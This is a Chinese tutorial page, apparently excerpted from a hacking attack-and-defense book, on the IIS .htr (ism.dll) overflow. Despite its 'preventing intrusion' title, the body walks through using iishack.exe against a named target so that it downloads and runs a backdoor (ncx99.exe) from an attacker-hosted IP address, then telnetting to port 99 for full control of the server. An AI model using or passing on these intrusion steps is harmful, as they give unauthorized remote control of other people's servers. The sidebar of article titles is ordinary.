当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(9)

安全基础
用net start 可以启动肉鸡的命令(2)
用net start 可以启动肉鸡的命令(3)
用net start 可以启动肉鸡的命令(4)
DDOS攻击 如何判断是否遭到流量攻击
网络防“虫”手段和全局安全网络的应用
个人网络安全防卫手册(1)
个人网络安全防卫手册(2)
个人网络安全防卫手册(3)
个人网络安全防卫手册(4)
个人网络安全防卫手册(5)
个人网络安全防卫手册(6)
一位高手整理的IIS FAQ
使用Exchange 2003防御地址欺骗(1)
使用Exchange 2003防御地址欺骗(2)
RAdmin 服务端高级配置(1)
只防病毒不安全 网络还需防什么(1)
只防病毒不安全 网络还需防什么(2)
主动防御电脑病毒并非天方夜谭
用XPSP2防火墙打造最强护身甲(1)
用XPSP2防火墙打造最强护身甲(2)

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(9)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 103 ::
收藏到网摘: n/a

6.6 htr溢出入侵

    

6.6  htr溢出入侵

IISInetsrv目录下,有个DLL文件叫ism.dll,这个模块在Web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm利用这个漏洞,eEye写了两个程序:iishack.exencx99.exe

在命令提示符下运行iishack程序,如图6-60所示。

6-60  iishack运行界面

命令行运行格式:

iishack 目标主机 端口URL(ncx99链接路径)

入侵者必须自己有一个空间,把ncx99.exe上传到该空间下,比如入侵者将ncx99.exe上传的路径是:61.129.81.122/ls-net/ncx99.exe,而对方的IIS serversh.kill.com.cn,则输入如下内容:

iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe

如图6-61所示。

注意:

在输入ncx99.exe路径时不带http://

6-61  htr溢出

接着在提示符下输入:telnet sh.kill.com.cn 99即可通过99号端口登录到对方服务器。这样,入侵者就可以完全控制目标计算机。